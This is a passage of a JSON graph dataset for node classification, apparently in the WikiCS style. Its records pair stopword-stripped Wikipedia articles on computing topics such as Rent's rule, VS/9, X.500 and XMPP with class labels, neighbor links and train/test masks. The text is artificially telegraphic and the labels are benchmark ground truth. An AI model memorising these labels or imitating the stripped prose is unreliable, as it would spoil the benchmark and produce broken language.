      6584,
      2493,
      7629,
      479,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 10230,
    "label": 3,
    "text": "Rent's_rule:rent rule rent rule pertains organization computing logic specifically relationship number external signal connections logic block i.e. number pins number logic gates logic block applied circuits ranging small digital circuits mainframe computers 1960s e. f. rent ibm employee found remarkable trend number pins terminals boundaries integrated circuit designs ibm number internal components g logic gates standard cells log–log plot datapoints straight line implying power-law relation formula_1 p constants p 1.0 generally 0.5 p 0.8 rent findings ibm-internal memoranda published ibm journal research development 2005 relation described 1971 landman russo performed hierarchical circuit partitioning way hierarchical level top-down least number interconnections cut partition circuit less equal parts partitioning step noted number terminals number components partition partitioned sub-partitions found power-law rule applied resulting versus g plot named rent rule rent rule empirical result based observations existing designs therefore less applicable analysis non-traditional circuit architectures however provides useful framework compare similar architectures christie stroobandt later derived rent rule theoretically homogeneous systems pointed amount optimization achieved placement reflected parameter formula_2 rent exponent also depends circuit topology particular values formula_3 correspond greater fraction short interconnects constant formula_4 rent rule viewed average number terminals required single logic block since formula_5 formula_6 random arrangement logic blocks typically formula_7 larger values impossible since maximal number terminals region containing g logic components homogeneous system given formula_8 lower bounds p depend interconnection topology since generally impossible make wires short lower bound formula_9 often called intrinsic rent exponent notion first introduced hagen et al used characterize optimal placements also measure interconnection complexity circuit higher intrinsic rent exponent values correspond higher topological complexity one extreme example formula_10 long chain logic blocks clique formula_7 realistic 2d circuits formula_9 ranges 0.5 highly-regular circuits sram 0.75 random logic system performance analysis tools bacpac typically use rent rule calculate expected wiring lengths wiring demands estimate rent exponent one use top-down partitioning used min-cut placement every partition count number terminals connected partition compare number logic blocks partition rent exponent found fitting datapoints log–log plot resulting exponent p optimally partitioned circuits formula_13 longer case practical heuristic partitioning approaches partitioning-based placement algorithms formula_14 landman russo found deviation rent rule near far end i.e. partitions large number blocks known region ii rent rule similar deviation also exists small partitions found stroobandt called region iii another ibm employee donath discovered rent rule used estimate average wirelength wirelength distribution vlsi chips motivated system level interconnect prediction workshop founded 1999 entire community working wirelength prediction see survey stroobandt resulting wirelength estimates improved significantly since used technology exploration use rent rule allows perform estimates priori i.e. actual placement thus predict properties future technologies clock frequencies number routing layers needed area power based limited information future circuits technologies comprehensive overview work based rent rule published stroobandt",
    "neighbors": [
      2874,
      3323,
      3886
    ],
    "mask": "Test"
  },
  {
    "node_id": 10231,
    "label": 0,
    "text": "Text_simplification:text simplification text simplification operation used natural language processing modify enhance classify otherwise process existing corpus human-readable text way grammar structure prose greatly simplified underlying meaning information remains text simplification important area research natural human languages ordinarily contain complex compound constructions easily processed automation terms reducing language diversity semantic compression employed limit simplify set words used given texts text simplification illustrated example siddharthan 2006 first sentence contains two relative clauses one conjoined verb phrase text simplification system aims simplify first sentence second sentence “ ability simplify means eliminate unnecessary necessary may speak ”",
    "neighbors": [
      5122,
      2440,
      2059,
      6798,
      11538,
      1044,
      5399,
      538,
      3748,
      7599,
      4531,
      4662,
      2999,
      3127,
      2488,
      10557,
      1214,
      6208,
      3533,
      5197,
      6223,
      8538,
      5857,
      7780,
      7918,
      8046,
      8688,
      887,
      8440,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 10232,
    "label": 4,
    "text": "Defense_in_depth_(computing):defense depth computing defense depth also known castle approach information assurance ia concept multiple layers security controls defense placed throughout information technology system intent provide redundancy event security control fails vulnerability exploited cover aspects personnel procedural technical physical security duration system life cycle idea behind defense depth approach defend system particular attack using several independent methods layering tactic conceived national security agency nsa comprehensive approach information electronic security term defense depth computing inspired military strategy name quite different concept military strategy revolves around weaker perimeter defense intentionally yielding space buy time envelop ultimately counter-attack opponent whereas ia strategy simply involves parallel systems controls intentionally ceding ground cf honeypot defense depth divided three areas physical technical administrative physical controls anything physically limits prevents access systems fences guards dogs cctv systems like technical controls hardware software whose purpose protect systems resources examples technical controls would disk encryption fingerprint readers windows active directory hardware technical controls differ physical controls prevent access contents system physical systems administrative controls organization policies procedures purpose ensure proper guidance available regards security regulations met include things hiring practices data handling procedures security requirements usage non-standard ports valid means security using one following layers constitutes defense depth",
    "neighbors": [
      3843,
      11526,
      2324,
      5245,
      8343,
      2084,
      2213,
      8998,
      9256,
      7979,
      3629,
      5433,
      3262,
      4552,
      7887,
      10207,
      10466,
      5608,
      4972,
      11244,
      5749,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10233,
    "label": 4,
    "text": "Vault_Corporation:vault corporation vault corporation founded 1981 w. krag brotby unsung technology pioneer already successful real-estate entrepreneur brotby authored book software program called tax cash frustrated pirating software people making copies free without paying brotby came mechanism attempt defeat illegal copying called prolok disk us patent 4,785,361 technology influential many later copy-protection techniques original patent referenced 140 later patents prolok used many early 80 software companies including ashton-tate developers first massively successful pc database software vault also invested millions dollars legal front behalf software industry whole authoring testing first many controversial shrink wrap software law vault contract ultimately defeated 5th circuit federal appeals court",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10234,
    "label": 3,
    "text": "The_Return_of_Ishtar:return ishtar translating english resurrection ishtar action role-playing arcade game released namco 1986 runs namco system 86 hardware sequel tower druaga released two years earlier second game company babylonian castle saga series later ported msx nec pc-8801 fm7 sharp x68000 platforms also included namco museum volume 4 playstation return ishtar adventure game requires two players also first game namco password feature give players opportunity continue left first feature scoring system player 1 controls priestess ki fights magic player 2 controls sword-wielding prince gilgamesh sequel starts directly gilgamesh saved ki druaga focuses escape tower inhabitants gilgamesh ki avenge former master total 128 rooms sixty-floor tower screen scroll according ki location second player stay close partner traverse tower ki attacks casting spells enemies gilgamesh automatically draws sword whenever enemy gets close enough allowing attack enemy bumping blade similar adol ys games however colliding enemies also damage gilgamesh counter bottom-right screen decrease preset amount depending enemy type counter reaches 0 disappear game players also happen ki touched enemy also several different items found rooms collected aid gilgamesh ki quest easter egg game designer masanobu endō appears unconscious desk dead end room ki use blue crystal rod spell wake proceed warp gilgamesh calvary prison room reviewing namco museum volume 4 jeff gerstmann gamespot described return ishtar plain weird incredibly boring electronic gaming monthly shawn smith said genji heike clans pretty lame due difficult control games ... well fun",
    "neighbors": [
      1776,
      5753,
      10931,
      9006
    ],
    "mask": "Train"
  },
  {
    "node_id": 10235,
    "label": 2,
    "text": "VS/9:vs/9 vs/9 discontinued computer operating system available univac series 90 mainframes 90/60 90/70 90/80 late 1960s 1980s 90/60 90/70 repackaged univac 9700 computers rca acquisition sperry determined rca tsos operating system far advanced univac counterpart company opted merge univac hardware rca software introduced 90/70 90/60 introduced shortly thereafter slower less expensive 90/70 introduction 90/80 vs/9 finally hardware platform optimized take full advantage capability allow interactive batch operations computer september 1971 rca decided exit mainframe computer business losing half billion dollars trying failing compete ibm assets computer division sold univac included rca spectra series computers various external hardware designs video terminals tape drives punched card readers operating system time sharing operating system tsos tsos may better operating system user standpoint ibm time operating systems considered something sold separately computer manufacturer included free part purchase price univac introduced additional new features tsos renamed vs/9 name 'tsos however remained username primary privileged system manager account unix-type systems called 'root rca also sold tsos would become fujitsu basis fujitsu bs2000 operating system mainframes name interactive use vs/9 done terminals connected terminal concentrator unit passed control signals terminals manner similar way ibm would provide ibm 3270-style terminals provided general input terminal sent response enter key opposed practice pcs taking input one character time concentrator unit originally known communications control module ccm however rca sold patents designs ccm terminal controller singer corporation univac developed emulator device ccm known multiterminal connection controller model 16 mcc-16 mcc-16 supported univac standard terminal rca renamed uniscope video display terminal vdt well ordinary ascii dumb terminals univac uniscope vdt provided sophisticated time editing capability including ability edit text screen make changes line time page time transmit text back computer vdt also supported direct cursor positioning input protection cursor indicated text cursor recognized also supported special scroll mode subset screen window instead entire screen scrolling upward last line displayed possible make scroll area bottom half screen feature split screen scroll would become available 20 years later apple ii microcomputer distinction made interactive timesharing terminals transactional terminals interactive terminals controlled directly operating system transactional terminals controlled batch program initially batch program known mcp multichannel communications program developed rca sperry batch-oriented operating systems tdos tape-disk operating system dos disk operating system became clear would phased favor much robust interactive operating system vmos mcp ported run vmos vmos virtual memory operating system became new moniker tsos rca spectra 70 models 46 61 3 7 computers initially univac series 70 formerly rca computers eventually mcp enhanced support sperry univac terminals name changed cos communication operating system ports ccm later mcc running emulation mode could designated either interactive transactional port designated interactive port controlled timesharing services integrated vmos vs/9 operating system transactional ports hand controlled cos. terminals connected ports became property respective controlling host software timesharing used program development allowing much faster program development traditional batch process state art time timesharing user task could execute programs create files request system resources needed made much possible operating system ability manage virtual memory temporarily save pages memory including executing programs disk drum use retrieve later needed virtual memory page size fixed 4096 bytes allowed many tasks running simultaneously would otherwise constrained limited expensive main memory space transactional users hand controlled single program view environment limited presented identified individual tasks ability run programs request system resources ccm mcc running emulation mode dumb hardware interfaces network protocol intelligence including terminal polling error recovery message construction resided mainframe ccm mcc simply acted conduits mainframe phone lines mcc used true front end processor much overhead polling error recovery offloaded mainframe thus freeing computer time running application programs occur vs/9 era vs/9 supported one card readers connected computer activated user placing card deck hopper pressing start button presumably computer would read source deck place cards read output hopper card deck consisted valid login would process card deck job execute vs/9 controlled computer operator central site computer operators interacted system system console initially console teletype device later upgraded video display device attached system console printer system console messages logged system console printer unsolicited messages originating operating system also logged system console printer computer operators number responsibilities one useful enhancements late life vs/9 volume groups disk technology time provided limited storage space disk since disk drives comparatively large quite expensive manufacturers disk drives provided capability physically remove actual disk device replace another customers thus ability store many times capacity disk drives albeit could necessarily used simultaneously unless enough free disk drives limited disk storage space also presented users another problem often files would larger could contained one disk volume groups helped mitigate technological problem allowing files span multiple disks volumes disks mounted simultaneously designated volume group owners could defined order limit access sensitive data mounted attached active task entire volume group could dismounted attached tasks either released terminated every disk available system part volume group even one volume group volume groups could designated removable fixed fixed volume groups could removed time necessary disks housed operating system files supported transactional terminals remote batch processing rbp capability existed vs/9 although never completely exploited probably due limited demand rbp allowed remote users submit batch jobs execution mainframe receive results back offsite printer typically remote batch device consisted card reader printer connected communication line interfaced remote batch services operating system like local batch job operators could receive requests tape disk mounts/dismounts program prompts responses questions vs/9 managed tasks task type task types could either executing programs queues pending tasks following task types used vs/9 mcp cos always type 2 tasks computer operator would see count number tasks within queue system console complete list task queues available interactive terminal administrator access via field-written program known stat200 program would scan task queues every seconds display rolling list tasks terminal screen interrupted terminated officially released product became de facto standard task monitoring vs/9 controlled access use account name user name account name 1 7 character identifier user name also 1 8 character identifier identifiers account names user names could letters numbers account name equivalent directory name unix-style user accounts note user name indicated person sharing account party using thus example account name s0103 two users whose name pat leslie account would complete identifier s0103 pat s0103 leslie files would stored directory s0103 thus could create files name note account name say pa5 user named pat identifier would pa5 pat would completely unrelated user named pat accounts could given restrictions requiring password use limits amount files amount usage time permitted usage allowing logons 5 p.m. 8 a.m. cpu limits user could also issue commands system interrupt program current session used certain amount wall-clock cpu time user terminal logged wanted start session would press red transmit key univac vdt use control-c ascii terminal vs/9 would issue following response followed slash case univac vdt prompt character looked like inverse color greater sign user would logon typing word 'logon followed identifier e.g account name comma user name password account would type comma followed password could 1 4 characters contained one spaces trailing spaces could omitted typed single quotes contained non-printable binary characters typed using letter x followed quote 8-character hexadecimal value password account s0103 password hexadecimal a0b0c0 space user leslie would logon system typing credentials incorrect either account name user name password incorrect would get message would given prompt logon credentials correct system manager owner account tsos posted system message would display time user would command mode standard prompt would appear could type various commands user would finish session typing logoff pressing transmit univac vdt control-c ascii terminal univac vdt terminal four function keys top vs/9 specifically recognized vs/9 accepted commands typing command options commands issued batch stream either cards batch file required preceded slash commands entered terminal require use slash commands included following one issued break running program break key ascii terminal f1 key univac vdt used load command instead exec one would break mode program suspended allow user command mode could issue commands well following file names could 56 characters length file could consist letters numbers dashes digits file name digits permissible file could two consecutive periods access file another account necessary user account make file public file public could accessed another user prefixing name file indicator file referenced another account dollar sign followed account name followed period file named account s0103 user account pa5 wanted access file account s0103 first file would marked public second would referenced account name name file user account pa5 wanted access file account s0103 file public would reference s0103.a note user account s0103 could reference file simply could reference fully qualified file name including dollar sign account name followed period name public files special account tsos could accessed using alone first character file unless file began name identical account number case explicit account reference tsos would required also tsos would called path name missing files referenced name found user account example file called s0103.xyzzy account tsos account system named s0103 user wanting access would access tsos.s0103.xyzzy tsos also default account file referenced exist locally example execute edt editor program one would issue command run program exec followed name file called edt user created file named edt could execute edt editor typing pressing transmit key reason created program name use system editor would type could explicitly type system account unisys discontinued sales 9000 series mainframes favor exec 8 series computers probably longer cost effective market mainframes shrank vs/9 effectively abandoned company",
    "neighbors": [
      2560,
      6155,
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      9784,
      10809,
      576,
      2625,
      6221,
      3160,
      10333,
      97,
      11363,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      242,
      5363,
      9466,
      2811,
      3323,
      9468,
      1278,
      10499,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      10016,
      292,
      2345,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      11601,
      7507,
      7511,
      10590,
      3426,
      8551,
      5484,
      7020,
      3443,
      5492,
      2933,
      11635,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11667,
      11675,
      8092,
      2462,
      5022,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      9137,
      5044,
      10676,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      10730,
      10731,
      8687,
      6128,
      5105,
      3571,
      5619,
      5115
    ],
    "mask": "Test"
  },
  {
    "node_id": 10236,
    "label": 7,
    "text": "Comparison_of_business_integration_software:comparison business integration software article comparison notable business integration business process automation software scope comparison supported hardware depends supported operating systems",
    "neighbors": [
      1280,
      4107,
      6797,
      270,
      1041,
      10389,
      10134,
      1304,
      9124,
      9252,
      9389,
      8751,
      11184,
      823,
      9665,
      2501,
      6862,
      11515,
      6483,
      5210,
      8539,
      7022,
      9455,
      10099,
      2168,
      6522,
      3323,
      2172
    ],
    "mask": "None"
  },
  {
    "node_id": 10237,
    "label": 3,
    "text": "Multipath_I/O:multipath i/o computer storage multipath i/o fault-tolerance performance-enhancement technique defines one physical path cpu computer system mass-storage devices buses controllers switches bridge devices connecting example scsi hard disk drive may connect two scsi controllers computer disk may connect two fibre channel ports one controller port switch fail operating system route i/o remaining controller port switch transparently changes visible applications perhaps resulting increased latency multipath software layers leverage redundant paths provide performance-enhancing features including dynamic load balancing traffic shaping automatic path management dynamic reconfiguration",
    "neighbors": [
      11233,
      9571,
      1801,
      8233,
      1291,
      366,
      1776,
      9882,
      1304,
      8602
    ],
    "mask": "Test"
  },
  {
    "node_id": 10238,
    "label": 5,
    "text": "X.500:x.500 x.500 series computer networking standards covering electronic directory services x.500 series developed telecommunication standardization sector international telecommunications union itu-t itu-t formerly known consultative committee international telephony telegraphy ccitt x.500 approved first 1988 directory services developed support requirements x.400 electronic mail exchange name lookup international organization standardization iso partner developing standards incorporating open systems interconnection suite protocols iso/iec 9594 corresponding iso identification protocols defined x.500 include protocols used osi networking stack number alternatives dap developed allow internet clients access x.500 directory using tcp/ip networking stack well-known alternative dap lightweight directory access protocol ldap dap x.500 protocols use tcp/ip networking stack ldap remains popular directory access protocol primary concept x.500 single directory information tree dit hierarchical organization entries distributed across one servers called directory system agents dsa entry consists set attributes attribute one values entry unique distinguished name formed combining relative distinguished name rdn one attributes entry rdns superior entries root dit ldap implements similar data model x.500 description data model article ldap x.520 x.521 together provide definition set attributes object classes used representing people organizations entries dit one widely deployed white pages schema x.509 portion standard providing authentication framework also widely used outside x.500 directory protocols specifies standard format public-key certificates current use x.509v3 certificates outside directory structure loaded directly web browsers necessary e-commerce develop allowing secure web based ssl/tls communications require x.500 directory source digital certificates originally conceived x.500 1988 one contrast role x.500 x.509 understand relationship x.509 designed secure access method updating x.500 www web browsers became popular needed simple method encrypting connections transport layer web sites hence trusted root certificates supported certificate authorities pre loaded certificate storage areas personal computer device added security envisaged scheduled 2011-2014 implementation us national strategy trusted identities cyberspace two- three-year project protecting digital identities cyberspace www e-commerce implementation x.509v3 bypassed replace original iso standard authentication mechanism binding distinguished names x.500 directory packages certificates added removed end user software reviewed microsoft mozilla terms continued trustworthiness problem arise occurred diginotar browser security experts issue update mark certificate authority untrusted serious removal effectively ca internet trust x.500 offers way view organization claims specific root certificate outside provided bundle function 4 corner model trust adding another check determine root certificate compromised rules governing federal bridge policy revoking compromised certificates available www.idmanagement.gov contrast browser bundled approach x.500 ldap attribute cacertificate bound directory entry checked addition default pre-loaded bundle certificates end users typically never noticed unless ssl warning message appeared example web site using ssl typically dns site name www.foobar.com verified browser software using libraries would check see certificate signed one trusted root certificates given user therefore creating trust users reached correct web site via https however stronger checks also possible indicate domain name verified contrast x.500 certificate one attribute many entry entry could contain anything allowable specific directory schema thus x.500 store digital certificate one many attributes could potentially verify organization physical address contact telephone number email contact ca certs certificate authority certs loaded browser automatically case microsoft update mechanism new version updates browsers user given choices import delete develop individual trust relationship loaded certificate authorities determine browser behave ocsp revocation servers unreachable contrast directory model associates attribute cacertificate listed certificate authority thus browser verify ssl cert website means loaded group accepted certificates root certificates looked x.500 ldap directory via http/s imported list trusted certificate authorities bound distinguished name located subject fields certificate matches directory entry x.509v3 contain extensions depending community interest international domain names broad internet use rfc-5280 pkix describes profile fields may useful applications encrypted email end user relies authenticity certificate presented browser email simple way compare forged certificate presented perhaps triggers browser warning valid certificate without also given opportunity validate dn distinguished name designed looked x.500 dit certificate public considered unforgeable therefore distributed manner associated binding identity occurs directory binding links certificate identity claims using certificate example x.500 software runs federal bridge cross certificates enable trust certificate authorities simple homographic matching domain names resulted phishing attacks domain appear legitimate x.509v3 certificate bound valid organization distinguished name within directory simple check made regards authenticity certificate comparison presented browser present directory options exist check notaries see certificate recently seen therefore likely compromised cert likely trusted failing domain name slight mismatch initially fail browser subjected notary trust bypass browser warning valid organizational entry o=foobarwidgets also associated alphanumeric oid identity proofed ansi providing another layer assurance regarding binding certificate identity recent events 2011 indicated threat unknown actors nation states forged certificates done order create mitm attack political activists syria accessing facebook web would normally triggered browser warning would mitm certificate issued valid certificate authority already trusted browser software similar attacks used stuxnet allowed software impersonate trusted code point certificate transparency allow end user determine using simple procedure certificate fact valid checking default bundle certificates may enough therefore additional check desired suggestions certificate transparency also advanced different attack used comodo certificate authority resulted forged certificates directed high-profile communications websites necessitated emergency patch major browsers certificates actually issued trusted certificate authority therefore user would warning gone faked website contrast syria incident certificate crudely forged including substituting alto palo palo alto incorrect serial numbers projects designed exchange phi protected health information considered highly hipaa sensitive may obtain x.509v3 certs via cert dns resource record via ldap x.500 2008 directory issue authoritative bind detailed rfcs related accuracy dns information secured signing root using dnssec concept root name servers source major contention internet community dns largely resolved name space associated x.500 traditionally thought start national naming authority mirrors iso/itu approach global systems national representation thus different countries create unique x.500 services u.s. x.500 privatized 1998 u.s. government longer offered x.500 dns registration outside known government agencies x.500 pilot project development commercial space technology continues present major installations millions users within corporate data centers within u.s. government credentialing authors rfc 2693 concerning spki note original x.500 plan unlikely ever come fruition collections directory entries ... considered valuable even confidential owning lists likely released world form x.500 directory sub-tree x.500 idea distinguished name single globally unique name everyone could use referring entity also likely occur x.500 complex support desktops internet ldap created provide service 'for rest us",
    "neighbors": [
      10752,
      9352,
      8854,
      8471,
      5531,
      11036,
      5149,
      2206,
      9245,
      929,
      5413,
      6054,
      10413,
      11056,
      8627,
      3126,
      2359,
      1079,
      5816,
      6710,
      1086,
      11456,
      6977,
      8904,
      1610,
      9290,
      8524,
      3026,
      6229,
      9429,
      2519,
      2904,
      4058,
      6110,
      4064,
      7010,
      8674,
      8421,
      8426,
      5614,
      1010,
      3447,
      6651,
      2045,
      10238,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 10239,
    "label": 9,
    "text": "ObjectPAL:objectpal objectpal short object-oriented paradox application language programming language used borland paradox database application owned corel paradox 11th version constituent corel word perfect x3 office suite 32-bit microsoft windows language tightly-bound application forms provides rapid robust development environment creating database applications windows objectpal full free-standing object-oriented language belongs family languages inspired hypercard influences pal wherever functionality could kept smalltalk garnet ui language created brad myers objects encapsulate source code support polymorphism limited inheritance concept wedded objects form controlled code placed higher object form object hierarchy however objectpal provides wideranging versatile language creating paradox applications syntax structure language resembles visual basic knowing visual basic would help someone new objectpal sense programming skill would transferable objectpal objectpal successor pal paradox dos programming language advent paradox windows 1.0 1993 owned borland corporation objectpal born version 1.0 quickly succeeded version 4.5 year used web server scripting language combined corel web server control ocx implements server api similar cgi standalone console corel web server",
    "neighbors": [
      8262,
      6797,
      847,
      10899,
      9780,
      2901,
      2485
    ],
    "mask": "Test"
  },
  {
    "node_id": 10240,
    "label": 3,
    "text": "Ys_II:_Ancient_Ys_Vanished_–_The_Final_Chapter:ys ii ancient ys vanished – final chapter later adapted anime ys ii castle heavens 1992 like predecessor ys ii ported various platforms following first release fm-7 x1 msx2 famicom released along predecessor part enhanced compilation ys ii turbografx-cd hudson soft 1989 many years version ys ii received official english release ms-dos remake called ys ii special developed mantra released exclusively south korean market 1994 mash-up ys ii anime ys ii castle heavens 1992 along large amount new content including secrets version game game success korea despite competition korean rpg astonishia story year years later third remake released microsoft windows-based pcs ys ii eternal later ys ii complete versions game also developed mobile phone platforms ys ii also remade 2008 nintendo ds english translation version released atlus north america along ds version ys single card legacy ys books ii 2009 japanese version released single game came 2008 ys ii picks immediately ys left adol christin transported floating island ys meets young woman named lilia takes adol home lance village begin quest unravel secrets ys finally rid esteria evil player controls adol battles way across land ys first game adol strength measured typical rpg fashion numerical statistics hp attack power defense power determine strength stats increased raising experience level battling also returning first game 'bump combat system player attacks enemies running enemy takes damage according adol stats enemy stats adol position enemy position new addition ys ii magic system adol acquire several different spells use throughout course play fire spell attack time spell stop enemies long active use magic consumes adol mp stat another major change combat game compared previous game bump combat system used bosses crashing two bosses game attempt damage result adol taking damage bosses must defeated fire spell soundtrack ys ii composed yuzo koshiro hideya nagata several music cds dedicated music ys ii released falcom include japanese game magazine famitsu gave famicom nes version score 27 40 famitsu gave pce-cd turbografx-cd version score 35 40",
    "neighbors": [
      2249,
      9166,
      445,
      6797
    ],
    "mask": "Test"
  },
  {
    "node_id": 10241,
    "label": 3,
    "text": "Xploder:xploder xploder brand game cheats multimedia devices games consoles similar action replay xploder products released dreamcast ps2 playstation psp xbox gamecube n64 game boy game boy advance pc others support ps3 xbox 360 nintendo wii started 2006-2007 xploder products often bundled accessories game consoles lexar memory sticks psp x-link cable ps2 v5 media centre version newer versions xbox 360 playstation 3 allow users download saved games internet utilizing xploder disc original playstation users found possible boot backup copied versions games",
    "neighbors": [
      8937,
      9477,
      8782
    ],
    "mask": "Test"
  },
  {
    "node_id": 10242,
    "label": 5,
    "text": "XMPP:xmpp extensible messaging presence protocol xmpp communication protocol message-oriented middleware based xml extensible markup language enables near-real-time exchange structured yet extensible data two network entities originally named jabber protocol developed homonym open-source community 1999 near real-time instant messaging im presence information contact list maintenance designed extensible protocol used also publish-subscribe systems signalling voip video file transfer gaming internet things iot applications smart grid social networking services unlike instant messaging protocols xmpp defined open standard uses open systems approach development application anyone may implement xmpp service interoperate organizations implementations xmpp open protocol implementations developed using software license many server client library implementations distributed free open-source software numerous freeware commercial software implementations also exist internet engineering task force ietf formed xmpp working group 2002 formalize core protocols ietf instant messaging presence technology xmpp working group produced four specifications rfc 3920 rfc 3921 rfc 3922 rfc 3923 approved proposed standards 2004 2011 rfc 3920 rfc 3921 superseded rfc 6120 rfc 6121 respectively rfc 6122 specifying xmpp address format 2015 rfc 6122 superseded rfc 7622 addition core protocols standardized ietf xmpp standards foundation formerly jabber software foundation active developing open xmpp extensions xmpp-based software deployed widely across internet 2003 used ten million people worldwide according xmpp standards foundation jeremie miller began working jabber technology 1998 released first version jabberd server january 4 1999 early jabber community focused open-source software mainly jabberd server major outcome proved development xmpp protocol early jabber protocol developed 1999 2000 formed basis xmpp published rfc 3920 rfc 3921 primary changes formalization ietf xmpp working group addition tls channel encryption sasl authentication note rfc 3920 rfc 3921 superseded rfc 6120 rfc 6121 published 2011 first im service based xmpp jabber.org operated continuously offered free accounts since 1999 1999 february 2006 service used jabberd server software time migrated ejabberd free software application servers january 2010 service migrated proprietary m-link server software produced isode ltd august 2005 google introduced google talk combination voip im system uses xmpp instant messaging base voice file transfer signaling protocol called jingle initial launch include server-to-server communications google enabled feature january 17 2006 google since added video functionality google talk also using jingle protocol signaling may 2013 google announced xmpp compatibility would dropped google talk server-to-server federation although would retain client-to-server support january 2008 aol introduced experimental xmpp support aol instant messenger aim service allowing aim users communicate using xmpp however march 2008 service discontinued may 2011 aol offers limited xmpp support september 2008 cisco systems acquired jabber inc. creators commercial product jabber xcp february 2010 social-networking site facebook opened chat feature third-party applications via xmpp functionality unavailable xmpp support dropped april 2014 similarly december 2011 microsoft released xmpp interface microsoft messenger service skype de facto successor also provides limited xmpp support however native xmpp implementations xmpp network uses client–server architecture clients talk directly one another model decentralized anyone run server design central authoritative server services aol instant messenger windows live messenger confusion often arises point public xmpp server run jabber.org large number users subscribe however anyone may run xmpp server domain every user network unique xmpp address called jid historical reasons xmpp addresses often called jabber ids jid structured like email address username domain name ip address server user resides separated sign username example.com since user may wish log multiple locations may specify resource resource identifies particular client belonging user example home work mobile may included jid appending slash followed name resource example full jid user mobile account could username example.com/mobile resource may specified numerical value called priority messages simply sent username example.com go client highest priority sent username example.com/mobile go mobile client highest priority one largest numerical value jids without username part also valid may used system messages control special features server resource remains optional jids well means route messages based logical endpoint identifier jid instead explicit ip address present opportunities use xmpp overlay network implementation top different underlay networks one original design goals early jabber open-source community enabling users connect multiple instant messaging systems especially non-xmpp systems single client application done entities called transports gateways instant messaging protocols also protocols sms email unlike multi-protocol clients xmpp provides access server level communicating via special gateway services running alongside xmpp server user register one gateways providing information needed log network communicate users network though xmpp users thus gateways function client proxies gateway authenticates user behalf non-xmpp service result client fully supports xmpp access network gateway without extra code client without need client direct access internet however client proxy model may violate terms service protocol used although terms service legally enforceable several countries also requires user send im username password third-party site operates transport may raise privacy security concerns another type gateway server-to-server gateway enables non-xmpp server deployment connect native xmpp servers using built interdomain federation features xmpp server-to-server gateways offered several enterprise im software products including xmpp provides general framework messaging across network offers multitude applications beyond traditional instant messaging im distribution presence data several service discovery protocols exist today zeroconf service location protocol xmpp provides solid base discovery services residing locally across network availability services via presence information specified xep-0030 disco building capability support discovery across local network domains xmpp well-suited cloud computing virtual machines networks firewalls would otherwise present obstacles alternative service discovery presence-based solutions cloud computing storage systems rely various forms communication multiple levels including messaging systems relay state also migration distribution larger objects storage virtual machines along authentication in-transit data protection xmpp applied variety levels may prove ideal extensible middleware message-oriented middleware mom protocol widely known ability exchange xml-based content natively become open platform exchange forms content including proprietary binary streams full motion video fmv content transport file-based content via example jingle series extensions majority applications nothing human communications i.e. im instead provide open means support machine-to-machine peer-to-peer communications across diverse set networks xmpp implemented large number clients servers code libraries implementations provided variety software licenses original native transport protocol xmpp transmission control protocol tcp using open-ended xml streams long-lived tcp connections alternative tcp transport xmpp community also developed http transport web clients well users behind restricted firewalls original specification xmpp could use http two ways polling binding polling method deprecated essentially implies messages stored server-side database fetched posted regularly xmpp client way http 'get 'post requests binding method implemented using bidirectional-streams synchronous http bosh allows servers push messages clients soon sent push model notification efficient polling many polls return new data client uses http firewalls allow clients fetch post messages without hindrances thus scenarios tcp port used xmpp blocked server listen normal http port traffic pass without problems various websites let people sign xmpp via browser furthermore open public servers listen standard http port 80 https port 443 ports hence allow connections behind firewalls however iana-registered port bosh actually 5280 80 several large public im services natively use xmpp including livejournal lj talk nimbuzz hipchat various hosting services dreamhost enable hosting customers choose xmpp services alongside traditional web email services specialized xmpp hosting services also exist form cloud domain owners need directly run xmpp servers including cisco webex connect chrome.pl flosoft.biz i-pobox.net hosted.im largest messaging providers use using various forms xmpp based protocols backend systems without necessarily exposing fact end users includes whatsapp google talk facebook chat deprecated facebook messaging system deployments built free-software erlang-based xmpp server called ejabberd xmpp also used deployments non-im services including smart grid systems demand response applications message-oriented middleware replacement sms provide text messaging many smartphone clients xmpp de facto standard private chat gaming related platforms origin raptr playstation discontinued xfire two notable exceptions steam xbox live use proprietary messaging protocols xmpp standards foundation xsf develops publishes extensions xmpp standards process centered xmpp extension protocols xeps previously known jabber enhancement proposals jeps following extensions especially wide use xmpp features federation across domains publish/subscribe authentication security even mobile endpoints used implement internet things several xmpp extensions part experimental implementation efficient xml interchange exi format sensor data provisioning control concentrators discovery efforts documented page xmpp wiki dedicated internet things xmpp iot mailing list ietf xmpp working group produced series request comments rfc documents important widely implemented specifications xmpp often regarded competitor simple based session initiation protocol sip standard protocol instant messaging presence notification xmpp extension multi-user chat seen competitor internet relay chat irc although irc far simpler far fewer features far widely used xmpp extensions publish-subscribe provide many features advanced message queuing protocol amqp xmpp standards foundation xsf formerly jabber software foundation active developing open xmpp extensions called xep however extensions also defined individual software project organization another example federation protocol apache wave based xmpp",
    "neighbors": [
      514,
      2050,
      1030,
      9734,
      1036,
      10254,
      8211,
      6681,
      3610,
      6682,
      10269,
      10271,
      3105,
      6689,
      35,
      9251,
      2085,
      7208,
      9769,
      3629,
      7214,
      8238,
      562,
      1586,
      9269,
      8758,
      5687,
      11321,
      1594,
      1083,
      3133,
      5181,
      2111,
      6208,
      6723,
      8265,
      4687,
      87,
